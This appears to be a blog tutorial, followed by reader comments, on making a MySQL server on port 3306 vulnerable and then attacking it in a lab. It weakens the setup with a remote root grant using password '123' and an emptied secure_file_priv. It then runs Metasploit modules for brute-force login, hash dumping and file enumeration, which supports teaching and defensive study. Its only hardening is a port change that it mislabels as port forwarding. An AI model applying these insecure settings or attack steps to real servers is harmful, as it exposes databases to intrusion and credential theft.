Penetration Testing on MYSQL (Port 3306)
In this article, we will learn to make MySQL port vulnerable and then secure it for the penetration testing on the port 3306. In order to completely learn and understand how to secure service on a port, you have to understand how to make it vulnerable and then perform penetration testing. Because if you don’t understand what can be exploited and how then you will always fail to secure it.
Table of Content
- Introduction to MySQL-Server
- Installation of MySQL-Server
- Pen testing MySQL-Server
Introduction to MySQL-Server
The base of MySQL will be MySQL server, which handles the majority of the database guidelines (or directions). MySQL server is accessible as a different program for use in a customer server organized condition and as a library that can be implanted (or connected) into separate applications. MySQL works alongside a few utility projects which bolster the organization of MySQL databases. Directions are sent to MySQL-Server by means of the MySQL customer, which is introduced on a PC. It runs port 3306 by default.
Installation of MySQL-server
The first thing to do is to install MySQL server and to do so use the following command :
apt install mysql-server
Further, use the following command to check whether the server is up and running or not.
netstat -tnl
Pentesting MySQL-Server
Scanning Mysql & Connecting to Mysql
Now, as you can see the MySQL server is properly working. But if you will scan the port, it will show you that it’s closed.
nmap -p3306 192.168.1.108
This port is closed because as it is running on the local address when scanned with any other IP then it will show you that the port is closed when this is not the case. This happens because of the default setting in the configuration’s files of MySQL, the bind address is 127.0.0.1 i.e. the port will be shown open only if you scan from this IP just like shown in the image below. And to make this change open the configuration file using the following command:
nano /etc/mysql/mysql.conf.d/mysqld.cnf
To change this setting, just add ‘#’ in front of the ‘bind-address’ as shown in the image below :
Now if you scan it, it will show you that the port is open.
nmap -p3306 192.168.1.108
But further if you try to login through this port, it will give you an error. This happens because the MySQL server does not grant privileges to other IP’s to do their bidding.
This error can be removed when you login into the MySQL server and run the following commands which will grant all permission to the root user at when login from different IP :
GRANT ALL PRIVILEGES ON *.* TO root@'%' IDENTIFIED BY '123'; FLUSH PRIVILEGES;
Now, when you try and login, you will be successful as shown in the image below:
Let’s scan the port again to grab as many details as we can such as its banner. Mac address, etc.
nmap -sv -p3306 192.168.1.108
Mysql Brute-Force Attack
One can also brute force the port by using Metasploit. This module simply queries the MySQL instance for a specific user/pass for this, go to the terminal in kali and type ‘msfconsole’ and then use the following commands to commence the brute force login:
use auxiliary/scanner/mysql/mysql_login set rhosts 192.168.1.108 set user_file /root/Desktop/user.txt set pass_file /root/Desktop/pass.txt exploit
Running SQL queries without Login into Mysql
This module allows for simple SQL statements to be executed against a MySQL instance given the appropriate credentials. For this, type :
use auxiliary/admin/mysql/mysql_sql set rhosts 192.162.1.108 set username root set password 123 set sql show databases exploit
Extract Mysql-Schemadump Information
Our next module extracts the schema information from a MySQL DB server. For this exploit, type :
use auxiliary/scanner/mysql/mysql_schemadump set rhosts 192.168.1.108 set username root set password 123 exploit
Extracting Login from Mysql-server
And to extracts the usernames and encrypted password hashes from a MySQL server and stores them for later cracking; use the following exploit :
use auxiliary/scanner/mysql/mysql_hashdump set rhosts 192.168.1.108 set username root set password 123 exploit
Once the above module is completed, you see it result in the file it creates as shown in the image below:
Checking Writable Directories
Another attack that can be executed on Mysql port is to check the directories that are writable. But by default, this attack cannot be performed. So, admin, the has done following the configuration then an attacker can check for directories that are writable.
nano /etc/mysql/mysql.conf.d/mysqld.cnf
Then add at the end of the file.
secure_file_priv=""
Now if you run the following exploit through Metasploit, it will allow you to Enumerate writeable directories using the MySQL SELECT INTO DUMPFILE feature.
use auxiliary/scanner/mysql/mysql_writable_dirs set rhosts 192.168.1.108 set username root set password 123 set dir_list /root/dir.txt exploit
Enumerating File
For further pentesting MySQL port, you can use the following exploit for Enumerate files and directories using the MySQL load_file feature.
use auxiliary/scanner/mysql/mysql_file_enum set rhosts 192.168.1.108 set username root set password 123 set file_list /root/dir.txt exploit
Port Transferring
Next comes port forwarding. This method is used in order to secure the port from the attacks. For port forwarding, just open the configuration by using the following command:
nano etc/mysql/mysql.conf.d/mysqld.cnf
And then change the port number to whichever you desire. For instance, we have given here in 4033.
After changing the port, when you scan it, it will show you the SQL service is running on the new port instead of the default one.
So, this way to learn how to exploit and secure MySQL-Server.
Author: Yashika Dhir is a passionate Researcher and Technical Writer at Hacking Articles. She is a hacking enthusiast. contact here
Need help for pen testing.
Hi, Raj.
I can’t leave my password blank.
I pressed ENTER, and no response.
Can you help me, please?
Thank you.
Andriel,
I think you should not give “-p” in the mysql command if there’s no password. So your command should be: mysql -h hostname -u username
Excellent article, I was able to perform some of the exercises. Thanks again!
I have tried the mysql brute force attack with the correct RHOSTS, USER_file and PASS_file but when I run it metasploit says: unsupported version of mysql detected. skipping.
Now what?
You will have to specify the target with `set target [target id]`, You can see the available targets by `show targets`. If you are brute-forcing passwords of the MySQL server, using hydra is much quicker.
very good exploit thank you so much